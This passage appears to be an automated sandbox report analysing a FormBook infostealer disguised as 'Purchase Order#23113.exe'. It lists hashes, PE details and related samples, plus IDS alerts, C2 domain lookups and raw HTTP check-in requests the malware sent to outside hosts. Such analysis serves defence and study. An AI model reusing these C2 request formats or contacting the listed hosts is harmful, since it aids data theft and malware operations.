                                                                          SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          https://duck-mushroom-fwry.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                          • 198.185.159.177
                                                                          GSO3357.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          iU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          https://reed-cat-fb53.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                          • 198.185.159.177
                                                                          PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          AMAZON-02USdVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                                                          • 76.76.21.123
                                                                          3PhhXne1YD.exeGet hashmaliciousFormBookBrowse
                                                                          • 44.227.76.166
                                                                          Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                          • 13.228.81.39
                                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                                          • 75.2.26.164
                                                                          http://rhb.wigitally.com/interx/trackerGet hashmaliciousUnknownBrowse
                                                                          • 52.76.69.246
                                                                          d7Jv5EG8Q1.elfGet hashmaliciousMiraiBrowse
                                                                          • 34.249.145.219
                                                                          SecuriteInfo.com.Linux.Siggen.9999.23440.5437.elfGet hashmaliciousGafgytBrowse
                                                                          • 34.249.145.219
                                                                          FreeTemplates_46069682.msiGet hashmaliciousUnknownBrowse
                                                                          • 13.32.87.98
                                                                          lSf5ZUqdZz.elfGet hashmaliciousMiraiBrowse
                                                                          • 34.249.145.219
                                                                          TOObMLc6ag.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 34.249.145.219
                                                                          sun-asnSC43ZYohKtbk.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.221.118.203
                                                                          PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbsGet hashmaliciousFormBookBrowse
                                                                          • 45.221.114.42
                                                                          2022-571-GLS.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.221.114.43
                                                                          Swift.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.221.114.43
                                                                          bk.mpsl-20220930-0404.elfGet hashmaliciousMiraiBrowse
                                                                          • 102.134.57.97
                                                                          v22-003920.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 45.221.109.201
                                                                          EtAT4sBTxbGet hashmaliciousMiraiBrowse
                                                                          • 45.221.118.202
                                                                          arm-20220318-0536Get hashmaliciousMirai MoobotBrowse
                                                                          • 45.221.118.204
                                                                          Payment Copy.exeGet hashmaliciousFormBookBrowse
                                                                          • 102.134.51.19
                                                                          Hilix.armGet hashmaliciousMiraiBrowse
                                                                          • 45.221.118.207
                                                                          CLOUDFLARENETUS0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                          • 172.67.220.25
                                                                          PO#240.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.27.85
                                                                          Shipping Docs.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.74.152
                                                                          8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.21.80.13
                                                                          CA8nLhW9fA.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.235.200.22
                                                                          V2i5WDBNV7.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.12.205
                                                                          SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                                          • 104.21.62.22
                                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                                          • 104.21.62.22
                                                                          No context
                                                                          No context
Process: C:\Users\user\Desktop\Purchase Order#23113.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.953634631965206
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Purchase Order#23113.exe
File size: 651'272 bytes
MD5: fa3e92f061246f3b1625e6f8b8291836
SHA1: a58763445fe7359a7b0a527ec1dc00ecdc7337f0
SHA256: ca1d2592c9726d9e3a6a57c55ac57b40d9aa3bc501393a40962afd5bd4946433
SHA512: 43b5abdf350150a7b150e4b5f44aefddf684757831650907f688f5cb600a2f151529a76a96d9279de01a890de0d4bbadf378f32ef8fee127f4908ead1e02d7b7
SSDEEP: 12288:VatwB1oVeonUYMjNczF8nmmE15zXl1l7Vu3GG2uSZ8HHke6otiMpdwnzU8yzXyD6:Etio5NeNcp8nmFX1c3nhSZ8nJXtiMwnO
TLSH: 60D412526338AFD0CA78CFF69934A5516BF364071830EEAA2DEF30DD1525B902A7161F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:...............0.................. ........@.. ....................... ............@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x49cd0e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xDB3AE2F9 [Sun Jul 21 05:58:17 2086 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 13/11/2018 00:00:00
Not After: 08/11/2021 23:59:59
Subject Chain:
• CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version: 3
Thumbprint MD5: DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1: 5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256: 4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial: 7C1118CBBADC95DA3752C46E47A27438
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          aaa
                                                                          cmp byte ptr [54433552h+esi], dh
                                                                          inc edx
                                                                          inc esp
                                                                          xor eax, 00000054h
                                                                          inc edx
                                                                          xor eax, 35504A42h
                                                                          inc edi
                                                                          cmp byte ptr [esi+00h], al
                                                                          add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x9ccbb          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9e000          0x694         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x9ba00          0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa0000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x9b334          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9ad34 | 0x9ae00 | 996ceaead858a769731f01d18ec37bb5 | False | 0.9556692645278451 | data | 7.961859461470405 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9e000 | 0x694 | 0x800 | 8c6f4d5cda789327928bc72a9969c967 | False | 0.3671875 | data | 3.6336147596979593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa0000 | 0xc | 0x200 | 491bd5371bb376879893bc7aed59dca8 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x9e090 | 0x404 | data | | | 0.4280155642023346
RT_MANIFEST | 0x9e4a4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/24-10:06:49.944631 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.4 | 66.147.240.91
04/08/24-10:06:29.007960 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49749 | 80 | 192.168.2.4 | 45.76.63.192
04/08/24-10:03:45.371301 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.4 | 102.134.40.151
04/08/24-10:04:46.028484 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.4 | 198.185.159.144
04/08/24-10:07:11.266292 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.4 | 45.88.201.15
04/08/24-10:04:25.566585 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.4 | 23.227.38.74
04/08/24-10:05:47.854456 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.4 | 13.248.169.48
04/08/24-10:05:27.536502 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.4 | 66.235.200.146
04/08/24-10:03:25.123202 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.4 | 172.67.165.166
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 8, 2024 10:03:24.766024113 CEST | 192.168.2.4 | 1.1.1.1 | 0xc78b | Standard query (0) | www.xaqh.info | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:03:44.700623035 CEST | 192.168.2.4 | 1.1.1.1 | 0x7a8d | Standard query (0) | www.mingshengglass.com | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:04.747859001 CEST | 192.168.2.4 | 1.1.1.1 | 0x2546 | Standard query (0) | www.yoursweets.online | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:25.216039896 CEST | 192.168.2.4 | 1.1.1.1 | 0x6d70 | Standard query (0) | www.massagechairspecialists.com | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:45.682569981 CEST | 192.168.2.4 | 1.1.1.1 | 0x235 | Standard query (0) | www.mks-digital.net | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:06.420367002 CEST | 192.168.2.4 | 1.1.1.1 | 0xe10d | Standard query (0) | www.brandonbirk.com | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:26.950292110 CEST | 192.168.2.4 | 1.1.1.1 | 0xcc84 | Standard query (0) | www.snugandkind.com | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:47.590989113 CEST | 192.168.2.4 | 1.1.1.1 | 0x60cf | Standard query (0) | www.owletbaby.shop | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:06:28.651906013 CEST | 192.168.2.4 | 1.1.1.1 | 0x62d3 | Standard query (0) | www.studioenginedemo.com | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:06:49.372261047 CEST | 192.168.2.4 | 1.1.1.1 | 0x9441 | Standard query (0) | www.oregonjobs.co | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:07:10.528311014 CEST | 192.168.2.4 | 1.1.1.1 | 0x731a | Standard query (0) | www.gratiasempirellc.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 8, 2024 10:03:24.998034954 CEST | 1.1.1.1 | 192.168.2.4 | 0xc78b | No error (0) | www.xaqh.info | | 172.67.165.166 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:03:24.998034954 CEST | 1.1.1.1 | 192.168.2.4 | 0xc78b | No error (0) | www.xaqh.info | | 104.21.16.9 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:03:45.183186054 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a8d | No error (0) | www.mingshengglass.com | | 102.134.40.151 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:04.875843048 CEST | 1.1.1.1 | 192.168.2.4 | 0x2546 | Name error (3) | www.yoursweets.online | none | none | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:25.436131954 CEST | 1.1.1.1 | 192.168.2.4 | 0x6d70 | No error (0) | www.massagechairspecialists.com | f24545-3.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:04:25.436131954 CEST | 1.1.1.1 | 192.168.2.4 | 0x6d70 | No error (0) | f24545-3.myshopify.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:04:25.436131954 CEST | 1.1.1.1 | 192.168.2.4 | 0x6d70 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:45.868081093 CEST | 1.1.1.1 | 192.168.2.4 | 0x235 | No error (0) | www.mks-digital.net | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:04:45.868081093 CEST | 1.1.1.1 | 192.168.2.4 | 0x235 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:45.868081093 CEST | 1.1.1.1 | 192.168.2.4 | 0x235 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:45.868081093 CEST | 1.1.1.1 | 192.168.2.4 | 0x235 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:04:45.868081093 CEST | 1.1.1.1 | 192.168.2.4 | 0x235 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:06.577879906 CEST | 1.1.1.1 | 192.168.2.4 | 0xe10d | Name error (3) | www.brandonbirk.com | none | none | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:27.411144972 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc84 | No error (0) | www.snugandkind.com | snugandkind.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:05:27.411144972 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc84 | No error (0) | snugandkind.com | | 66.235.200.146 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:47.722138882 CEST | 1.1.1.1 | 192.168.2.4 | 0x60cf | No error (0) | www.owletbaby.shop | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:05:47.722138882 CEST | 1.1.1.1 | 192.168.2.4 | 0x60cf | No error (0) | www.owletbaby.shop | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:06:28.869986057 CEST | 1.1.1.1 | 192.168.2.4 | 0x62d3 | No error (0) | www.studioenginedemo.com | studioenginedemo.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:06:28.869986057 CEST | 1.1.1.1 | 192.168.2.4 | 0x62d3 | No error (0) | studioenginedemo.com | | 45.76.63.192 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:06:49.721513987 CEST | 1.1.1.1 | 192.168.2.4 | 0x9441 | No error (0) | www.oregonjobs.co | oregonjobs.co | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:06:49.721513987 CEST | 1.1.1.1 | 192.168.2.4 | 0x9441 | No error (0) | oregonjobs.co | | 66.147.240.91 | A (IP address) | IN (0x0001) | false
Apr 8, 2024 10:07:11.099515915 CEST | 1.1.1.1 | 192.168.2.4 | 0x731a | No error (0) | www.gratiasempirellc.com | gratiasempirellc.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 8, 2024 10:07:11.099515915 CEST | 1.1.1.1 | 192.168.2.4 | 0x731a | No error (0) | gratiasempirellc.com | | 45.88.201.15 | A (IP address) | IN (0x0001) | false
                                                                          • www.xaqh.info
                                                                          • www.mingshengglass.com
                                                                          • www.massagechairspecialists.com
                                                                          • www.mks-digital.net
                                                                          • www.snugandkind.com
                                                                          • www.owletbaby.shop
                                                                          • www.studioenginedemo.com
                                                                          • www.oregonjobs.co
                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          0 | 192.168.2.4 | 49742 | 172.67.165.166 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:03:25.123202085 CEST | 160 | OUT | GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf HTTP/1.1
                                                                          Host: www.xaqh.info
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:03:25.314632893 CEST | 1286 | IN | HTTP/1.1 200 OK
                                                                          Date: Mon, 08 Apr 2024 08:03:25 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Mon, 08 Apr 2024 02:36:06 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNaHDgiwv%2BW0K6IEFCkLRWUso%2B9w%2F9%2BY9r6CJV21RJoJhjtNcZGGg08oYITzFovScZMZeexhm%2FP9aDdXgpxABihINaPJwxqPtVZxE3tj5OZtyHNF0jgoEtDz0amaIMvY"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8710bda26ea667ea-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Ascii: d96<!doctype html><html id="htmlRoot" class><head><script src="/app.config.js?v=0.0.1-1712543736927"></script><meta charset="UTF-8"/><link rel="icon" type="image/ico" href="/ico/favicon-47c6d6dd.ico"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,viewport-fit=cover"/><title>DisneyGO</title><script>(function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:3917697,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createEleme


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          1 | 192.168.2.4 | 49744 | 102.134.40.151 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:03:45.371300936 CEST | 169 | OUT | GET /vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.mingshengglass.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.4 | 49745 | 23.227.38.74 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:04:25.566585064 CEST | 178 | OUT | GET /vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.massagechairspecialists.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:04:25.700436115 CEST | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                          Date: Mon, 08 Apr 2024 08:04:25 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 4518
                                                                          Connection: close
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Referrer-Policy: same-origin
                                                                          Cache-Control: max-age=15
                                                                          Expires: Mon, 08 Apr 2024 08:04:40 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wANL7iq3n8fB6IVRAeYwRGh3sIo3VeJH9A%2F9X5RFh%2BF5wEjXy8HwdWZHaJonMe%2BesMkpMRkY4I4hP%2F17Mbxycb2CIz1YJ63HVLOQazvBus2LQ3%2Br4eGUcfnpnWWgzX8dahcqg3PacsXGW40pfKWENZg%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Server-Timing: cfRequestDuration;dur=8.000135
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          X-Download-Options: noopen
                                                                          Server: cloudflare
                                                                          CF-RAY: 8710bf1c2b697425-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta h


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.2.4 | 49746 | 198.185.159.144 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:04:46.028484106 CEST | 166 | OUT | GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvX HTTP/1.1
                                                                          Host: www.mks-digital.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:04:46.191276073 CEST | 1276 | IN | HTTP/1.1 400 Bad Request
                                                                          Cache-Control: no-cache, must-revalidate
                                                                          Content-Length: 77564
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Date: Mon, 08 Apr 2024 08:04:46 UTC
                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                          Pragma: no-cache
                                                                          Server: Squarespace
                                                                          X-Contextid: sVuDzrvl/wWLYSpjb
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          4 | 192.168.2.4 | 49747 | 66.235.200.146 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:05:27.536501884 CEST | 166 | OUT | GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z HTTP/1.1
                                                                          Host: www.snugandkind.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:05:27.916409016 CEST | 752 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 08 Apr 2024 08:05:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-Redirect-By: WordPress
                                                                          Location: http://snugandkind.com/vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z
                                                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                          X-Endurance-Cache-Level: 2
                                                                          X-nginx-cache: WordPress
                                                                          X-Newfold-Cache-Level: 2
                                                                          CF-Cache-Status: MISS
                                                                          Set-Cookie: _cfuvid=gfplOYp72HVZ35_JJ9NfjiYQMmKwgr0NbUaUZ.E.6PA-1712563527851-0.0.1.1-604800000; path=/; domain=.www.snugandkind.com; HttpOnly
                                                                          Server: cloudflare
                                                                          CF-RAY: 8710c09f78cb7428-MIA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.2.4 | 49748 | 13.248.169.48 | 80 | 2580 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Apr 8, 2024 10:05:47.854455948 CEST | 165 | OUT | GET /vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x HTTP/1.1
